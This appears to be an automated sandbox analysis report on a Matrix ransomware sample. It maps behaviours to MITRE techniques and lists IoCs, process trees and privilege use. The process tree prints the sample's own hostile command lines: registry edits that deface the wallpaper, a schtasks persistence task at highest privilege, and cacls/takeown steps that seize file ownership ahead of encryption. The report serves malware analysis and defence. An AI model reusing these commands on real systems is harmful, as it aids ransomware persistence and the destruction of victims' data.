File opened (read-only)	\??\A:	3w3GwRsK64.exe
File opened (read-only)	\??\I:	3w3GwRsK64.exe
File opened (read-only)	\??\O:	3w3GwRsK64.exe
File opened (read-only)	\??\W:	3w3GwRsK64.exe
File opened (read-only)	\??\Y:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\V:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\I:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\E:	3w3GwRsK64.exe
File opened (read-only)	\??\X:	3w3GwRsK64.exe
File opened (read-only)	\??\R:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\O:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\E:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\F:	3w3GwRsK64.exe
File opened (read-only)	\??\S:	3w3GwRsK64.exe
File opened (read-only)	\??\M:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\K:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\N:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\H:	3w3GwRsK64.exe
File opened (read-only)	\??\P:	3w3GwRsK64.exe
File opened (read-only)	\??\Q:	3w3GwRsK64.exe
File opened (read-only)	\??\U:	3w3GwRsK64.exe
File opened (read-only)	\??\U:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\Q:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\R:	3w3GwRsK64.exe
File opened (read-only)	\??\V:	3w3GwRsK64.exe
File opened (read-only)	\??\Y:	3w3GwRsK64.exe
File opened (read-only)	\??\G:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\B:	3w3GwRsK64.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\sbN0dq1o.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Athens	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-2	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-11	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\VideoLAN Website.url	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sl.pak	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.clusters	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\deploy\splash.gif	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\management\jmxremote.access	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Merida	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\v8_context_snapshot.bin	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-3	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Indian\Reunion	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Cancun	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Majuro	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Windows Mail\WinMail.exe	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\deploy\messages_de.properties	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created	C:\Program Files\Java\jre7\lib\fonts\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jre7\LICENSE	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_ja.jar	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\EST5EDT	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
324	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1752	vssadmin.exe

Modifies Control Panel 5 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\WallpaperStyle = "0"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\TileWallpaper = "0"	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1048	3w3GwRsK64.exe
1048	3w3GwRsK64.exe
1048	3w3GwRsK64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1048	3w3GwRsK64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1048	3w3GwRsK64.exe
Token: SeLoadDriverPrivilege	1048	3w3GwRsK64.exe
Token: SeTakeOwnershipPrivilege	1316	takeown.exe
Token: SeTakeOwnershipPrivilege	1432	takeown.exe
Token: SeTakeOwnershipPrivilege	1748	takeown.exe
Token: SeTakeOwnershipPrivilege	1332	takeown.exe
Token: SeTakeOwnershipPrivilege	1952	takeown.exe
Token: SeTakeOwnershipPrivilege	1256	takeown.exe
Token: SeTakeOwnershipPrivilege	1060	takeown.exe
Token: SeTakeOwnershipPrivilege	580	takeown.exe
Token: SeTakeOwnershipPrivilege	1268	takeown.exe
Token: SeTakeOwnershipPrivilege	1840	takeown.exe
Token: SeTakeOwnershipPrivilege	1240	takeown.exe
Token: SeTakeOwnershipPrivilege	944	takeown.exe
Token: SeTakeOwnershipPrivilege	1392	takeown.exe
Token: SeTakeOwnershipPrivilege	948	takeown.exe
Token: SeTakeOwnershipPrivilege	2028	takeown.exe
Token: SeTakeOwnershipPrivilege	1864	takeown.exe
Token: SeTakeOwnershipPrivilege	1932	takeown.exe
Token: SeTakeOwnershipPrivilege	320	takeown.exe
Token: SeTakeOwnershipPrivilege	1492	takeown.exe
Token: SeTakeOwnershipPrivilege	1540	takeown.exe
Token: SeTakeOwnershipPrivilege	592	takeown.exe
Token: SeTakeOwnershipPrivilege	1240	takeown.exe
Token: SeTakeOwnershipPrivilege	1040	takeown.exe
Token: SeTakeOwnershipPrivilege	384	takeown.exe
Token: SeTakeOwnershipPrivilege	1060	takeown.exe
Token: SeTakeOwnershipPrivilege	592	takeown.exe
Token: SeTakeOwnershipPrivilege	1892	takeown.exe
Token: SeTakeOwnershipPrivilege	1108	takeown.exe
Token: SeTakeOwnershipPrivilege	1524	takeown.exe
Token: SeTakeOwnershipPrivilege	2032	takeown.exe
Token: SeTakeOwnershipPrivilege	820	takeown.exe
Token: SeBackupPrivilege	328	vssvc.exe
Token: SeRestorePrivilege	328	vssvc.exe
Token: SeAuditPrivilege	328	vssvc.exe
Token: SeTakeOwnershipPrivilege	1256	takeown.exe
Token: SeIncreaseQuotaPrivilege	1440	WMIC.exe
Token: SeSecurityPrivilege	1440	WMIC.exe
Token: SeTakeOwnershipPrivilege	1440	WMIC.exe
Token: SeLoadDriverPrivilege	1440	WMIC.exe
Token: SeSystemProfilePrivilege	1440	WMIC.exe
Token: SeSystemtimePrivilege	1440	WMIC.exe
Token: SeProfSingleProcessPrivilege	1440	WMIC.exe
Token: SeIncBasePriorityPrivilege	1440	WMIC.exe
Token: SeCreatePagefilePrivilege	1440	WMIC.exe
Token: SeBackupPrivilege	1440	WMIC.exe
Token: SeRestorePrivilege	1440	WMIC.exe
Token: SeShutdownPrivilege	1440	WMIC.exe
Token: SeDebugPrivilege	1440	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1440	WMIC.exe
Token: SeRemoteShutdownPrivilege	1440	WMIC.exe
Token: SeUndockPrivilege	1440	WMIC.exe
Token: SeManageVolumePrivilege	1440	WMIC.exe
Token: 33	1440	WMIC.exe
Token: 34	1440	WMIC.exe
Token: 35	1440	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1440	WMIC.exe
Token: SeSecurityPrivilege	1440	WMIC.exe
Token: SeTakeOwnershipPrivilege	1440	WMIC.exe
Token: SeLoadDriverPrivilege	1440	WMIC.exe
Token: SeSystemProfilePrivilege	1440	WMIC.exe
Token: SeSystemtimePrivilege	1440	WMIC.exe
Token: SeProfSingleProcessPrivilege	1440	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1608 wrote to memory of 1664	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	26
PID 1608 wrote to memory of 1664	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	26
PID 1608 wrote to memory of 1664	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	26
PID 1608 wrote to memory of 1664	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	26
PID 1608 wrote to memory of 1848	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	28
PID 1608 wrote to memory of 1848	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	28
PID 1608 wrote to memory of 1848	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	28
PID 1608 wrote to memory of 1848	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	28
PID 1608 wrote to memory of 612	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	33
PID 1608 wrote to memory of 612	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	33
PID 1608 wrote to memory of 612	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	33
PID 1608 wrote to memory of 612	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	33
PID 1608 wrote to memory of 1000	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	34
PID 1608 wrote to memory of 1000	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	34
PID 1608 wrote to memory of 1000	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	34
PID 1608 wrote to memory of 1000	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	34
PID 612 wrote to memory of 1664	612	cmd.exe	37
PID 612 wrote to memory of 1664	612	cmd.exe	37
PID 612 wrote to memory of 1664	612	cmd.exe	37
PID 612 wrote to memory of 1664	612	cmd.exe	37
PID 1000 wrote to memory of 1900	1000	cmd.exe	38
PID 1000 wrote to memory of 1900	1000	cmd.exe	38
PID 1000 wrote to memory of 1900	1000	cmd.exe	38
PID 1000 wrote to memory of 1900	1000	cmd.exe	38
PID 612 wrote to memory of 2028	612	cmd.exe	40
PID 612 wrote to memory of 2028	612	cmd.exe	40
PID 612 wrote to memory of 2028	612	cmd.exe	40
PID 612 wrote to memory of 2028	612	cmd.exe	40
PID 612 wrote to memory of 2024	612	cmd.exe	41
PID 612 wrote to memory of 2024	612	cmd.exe	41
PID 612 wrote to memory of 2024	612	cmd.exe	41
PID 612 wrote to memory of 2024	612	cmd.exe	41
PID 1608 wrote to memory of 472	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	42
PID 1608 wrote to memory of 472	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	42
PID 1608 wrote to memory of 472	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	42
PID 1608 wrote to memory of 472	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	42
PID 472 wrote to memory of 1392	472	cmd.exe	44
PID 472 wrote to memory of 1392	472	cmd.exe	44
PID 472 wrote to memory of 1392	472	cmd.exe	44
PID 472 wrote to memory of 1392	472	cmd.exe	44
PID 472 wrote to memory of 820	472	cmd.exe	45
PID 472 wrote to memory of 820	472	cmd.exe	45
PID 472 wrote to memory of 820	472	cmd.exe	45
PID 472 wrote to memory of 820	472	cmd.exe	45
PID 472 wrote to memory of 1184	472	cmd.exe	46
PID 472 wrote to memory of 1184	472	cmd.exe	46
PID 472 wrote to memory of 1184	472	cmd.exe	46
PID 472 wrote to memory of 1184	472	cmd.exe	46
PID 1184 wrote to memory of 1940	1184	cmd.exe	47
PID 1184 wrote to memory of 1940	1184	cmd.exe	47
PID 1184 wrote to memory of 1940	1184	cmd.exe	47
PID 1184 wrote to memory of 1940	1184	cmd.exe	47
PID 1608 wrote to memory of 848	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	48
PID 1608 wrote to memory of 848	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	48
PID 1608 wrote to memory of 848	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	48
PID 1608 wrote to memory of 848	1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe	48
PID 848 wrote to memory of 592	848	cmd.exe	50
PID 848 wrote to memory of 592	848	cmd.exe	50
PID 848 wrote to memory of 592	848	cmd.exe	50
PID 848 wrote to memory of 592	848	cmd.exe	50
PID 848 wrote to memory of 1272	848	cmd.exe	51
PID 848 wrote to memory of 1272	848	cmd.exe	51
PID 848 wrote to memory of 1272	848	cmd.exe	51
PID 848 wrote to memory of 1272	848	cmd.exe	51

C:\Users\Admin\AppData\Local\Temp\ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
"C:\Users\Admin\AppData\Local\Temp\ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1608
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe" "C:\Users\Admin\AppData\Local\Temp\NWrwBOhz.exe"
  2⤵
  PID:1664
- C:\Users\Admin\AppData\Local\Temp\NWrwBOhz.exe
  "C:\Users\Admin\AppData\Local\Temp\NWrwBOhz.exe" -n
  2⤵
  - Executes dropped EXE
  PID:1848
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\sbN0dq1o.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:612
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\sbN0dq1o.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    - Modifies Control Panel
    PID:1664
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    - Modifies Control Panel
    PID:2028
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    - Modifies Control Panel
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\MUC1ISU8.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1000
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\MUC1ISU8.vbs"
    3⤵
    PID:1900
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\w9GiDE50.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:2024
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\w9GiDE50.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:324
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:436
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    PID:820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "DefaultID.pdf" -nobanner
